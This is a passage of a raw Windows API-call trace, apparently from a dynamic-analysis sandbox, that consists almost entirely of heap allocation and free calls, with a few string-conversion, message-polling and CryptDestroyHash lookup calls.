(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.934] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0099.934] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0099.934] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a740d0 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0099.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0099.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0099.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0099.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0099.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0099.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f70c0 [0099.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0099.936] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0099.936] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0099.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0099.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0099.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0099.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0099.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0099.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0099.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0099.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.941] 